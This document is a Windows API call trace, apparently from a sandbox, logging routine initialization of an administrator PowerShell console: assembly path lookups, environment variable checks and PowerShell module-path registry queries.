	[0138.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.114] CoTaskMemAlloc (cb=0x804) returned 0x1b7ce2a0
	[0138.114] GetConsoleTitleW (in: lpConsoleTitle=0x1b7ce2a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0138.211] CoTaskMemFree (pv=0x1b7ce2a0) 
	[0138.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0138.834] SetConsoleCtrlHandler (HandlerRoutine=0x2b068dc, Add=1) returned 1
	[0138.848] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0138.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.848] CoTaskMemFree (pv=0x1b7a4040) 
	[0138.862] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0138.864] CoCreateGuid (in: pguid=0x14da30 | out: pguid=0x14da30*(Data1=0x5f63e4c8, Data2=0xde6b, Data3=0x4dfc, Data4=([0]=0xbe, [1]=0xff, [2]=0xd0, [3]=0xb9, [4]=0xe8, [5]=0xe8, [6]=0x63, [7]=0xa5))) returned 0x0
	[0138.867] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0138.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0138.867] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.003] WinSqmIsOptedIn () returned 0x0
	[0139.003] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.003] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.004] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.004] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.005] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.005] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.005] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.005] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.006] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.006] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.006] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.008] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.008] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.008] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.009] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.009] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.009] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.012] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.012] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.017] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.018] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.018] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.018] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.018] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.018] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0139.976] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.976] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0139.976] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.977] CoTaskMemAlloc (cb=0xcc) returned 0x257310
	[0139.978] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x257310, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0139.978] CoTaskMemFree (pv=0x257310) 
	[0139.978] CoTaskMemAlloc (cb=0xf0) returned 0x1b7bff20
	[0139.978] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7bff20, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0139.978] CoTaskMemFree (pv=0x1b7bff20) 
	[0139.978] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5a8 | out: phkResult=0x14d5a8*=0x33c) returned 0x0
	[0139.978] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d52c, lpData=0x0, lpcbData=0x14d528*=0x0 | out: lpType=0x14d52c*=0x2, lpData=0x0, lpcbData=0x14d528*=0x6c) returned 0x0
	[0139.978] CoTaskMemAlloc (cb=0x70) returned 0x1d49b0
	[0139.978] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d4fc, lpData=0x1d49b0, lpcbData=0x14d4f8*=0x6c | out: lpType=0x14d4fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d4f8*=0x6c) returned 0x0
	[0139.978] CoTaskMemFree (pv=0x1d49b0) 
	[0139.978] CoTaskMemAlloc (cb=0xcc) returned 0x257310
	[0139.978] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x257310, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0139.978] CoTaskMemFree (pv=0x257310) 
	[0139.978] CoTaskMemAlloc (cb=0xcc) returned 0x257310
	[0139.978] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x257310, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0139.979] CoTaskMemFree (pv=0x257310) 
	[0139.982] RegCloseKey (hKey=0x33c) returned 0x0
	[0139.982] CoTaskMemAlloc (cb=0xcc) returned 0x257310
	[0139.982] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x257310, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0139.982] CoTaskMemFree (pv=0x257310) 
	[0139.982] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d5a8 | out: phkResult=0x14d5a8*=0x33c) returned 0x0
	[0139.982] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d52c, lpData=0x0, lpcbData=0x14d528*=0x0 | out: lpType=0x14d52c*=0x0, lpData=0x0, lpcbData=0x14d528*=0x0) returned 0x2
	[0139.982] RegCloseKey (hKey=0x33c) returned 0x0
	[0139.987] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.987] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.989] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.989] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.997] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.997] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.997] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0139.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0139.997] CoTaskMemFree (pv=0x1b7a4040) 
	[0139.999] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d398 | out: phkResult=0x14d398*=0x33c) returned 0x0
	[0139.999] RegQueryValueExW (in: hKey=0x33c, lpValueName="path", lpReserved=0x0, lpType=0x14d3ac, lpData=0x0, lpcbData=0x14d3a8*=0x0 | out: lpType=0x14d3ac*=0x1, lpData=0x0, lpcbData=0x14d3a8*=0x74) returned 0x0
	[0140.000] RegQueryValueExW (in: hKey=0x33c, lpValueName="path", lpReserved=0x0, lpType=0x14d31c, lpData=0x0, lpcbData=0x14d318*=0x0 | out: lpType=0x14d31c*=0x1, lpData=0x0, lpcbData=0x14d318*=0x74) returned 0x0
	[0140.000] CoTaskMemAlloc (cb=0x78) returned 0x1d49b0
	[0140.000] RegQueryValueExW (in: hKey=0x33c, lpValueName="path", lpReserved=0x0, lpType=0x14d2ec, lpData=0x1d49b0, lpcbData=0x14d2e8*=0x74 | out: lpType=0x14d2ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d2e8*=0x74) returned 0x0
	[0140.000] CoTaskMemFree (pv=0x1d49b0) 
	[0140.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0140.000] SetErrorMode (uMode=0x1) returned 0x1
	[0140.000] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d270 | out: lpFileInformation=0x14d270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0140.001] SetErrorMode (uMode=0x1) returned 0x1
	[0140.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0140.002] SetErrorMode (uMode=0x1) returned 0x1
	[0140.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d270 | out: lpFileInformation=0x14d270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0140.002] SetErrorMode (uMode=0x1) returned 0x1
